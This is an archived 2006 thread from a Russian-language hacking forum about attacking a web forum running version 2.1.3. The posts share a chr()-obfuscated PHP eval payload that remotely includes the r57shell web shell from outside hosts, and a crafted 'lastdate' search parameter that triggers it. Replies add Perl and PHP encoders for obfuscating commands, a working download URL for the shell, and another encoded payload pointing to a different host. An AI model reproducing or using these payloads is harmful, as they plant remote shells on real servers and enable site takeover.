ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу вместо Shell сайт производителя
   
 
 
Опции темы Поиск в этой теме Опции просмотра

вместо Shell сайт производителя
  #1  
Старый 04.10.2006, 01:50
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940

Репутация: 23
Отправить сообщение для Dimazzz с помощью ICQ
По умолчанию вместо Shell сайт производителя
дело вообщем татакое:

нашол форум 2.1.3 , создал топик с таким содержимым

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

после чего через поиск нашол свои топ и добавил
&lastdate=z|eval.*?%20//)%23e%00

но странно не получил долгожданный шелл , а почемуто подгрузилась страница производителя , как будто шелла у них нет на сервере. Помогите в чем может быть дело.
 

  #2  
Старый 04.10.2006, 02:37
^ацтанЬ^
Новичок
Регистрация: 04.08.2006
Сообщений: 23
Провел на форуме:
40384

Репутация: 1
По умолчанию
Хы ты че тока узнал? воид закрылся, все файлы тоже закрыты
нада расшифровать код этот и вставить свой шел в .тхт формате и потом будет работать се
Вот тебе код чеб зашифровать

PHP код:
#!usr/bin/perl
while ()
{
   print "\r\nCommand for encode or 'exit' for exit ";
   while(<STDIN>)
    {
       $cmd=$_;
       chomp($cmd);
       exit() if ($cmd eq 'exit');
       last;
    }
 $len length($cmd);
 for ($i=0$i<$len$i++)
    {
  $s substr($cmd,$i,1);
  $out.="chr(".ord($s).")";
  if($i != $len-1)
    {
     $out.=".";
     }
   
 }
print "eval(system(".$out.").chr(59).exit()); //";
$out "";

а зашифрованно там это:
PHP код:
eval("include \"http://rst.void.ru/download/r57shell.txt\";/*"); 
 

  #3  
Старый 04.10.2006, 04:03
qPhoenix
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме:
1509352

Репутация: 132
Отправить сообщение для qPhoenix с помощью ICQ
По умолчанию
Спрашивается, зачем усложнять себе жизнь?
Вот код на ПХП, куда вставлять адрес - думаю видно...
PHP код:
<?php
$str="include \"http://rst.void.ru/download/r57shell.txt.gz\";/*";// */
echo "eval( ";
for($i=0;$i<strlen($str);$i++)
{
    echo "chr(".ord($str[$i])."). ";
}
echo "chr(".ord(" ").") ); //";
?
Кстать, файлы на рст не закрыты, а просто у некоторых изменились имена и случилось это еще до закрытия проекта...

rst.void.ru/download/r57shell.txt.gz

хоть и gz - канает без проблем...
 

  #4  
Старый 04.10.2006, 08:17
^ацтанЬ^
Новичок
Регистрация: 04.08.2006
Сообщений: 23
Провел на форуме:
40384

Репутация: 1
По умолчанию
Ну так всеравно надо зашифрововать опять
 

  #5  
Старый 04.10.2006, 10:43
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Вот пользуйся этим :
PHP код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); // 
 

  #6  
Старый 04.10.2006, 23:13
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Пльзуйся своим. Перевести можно тут http://www.paulschou.com/tools/xlate/
__________________
Full DNS report
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ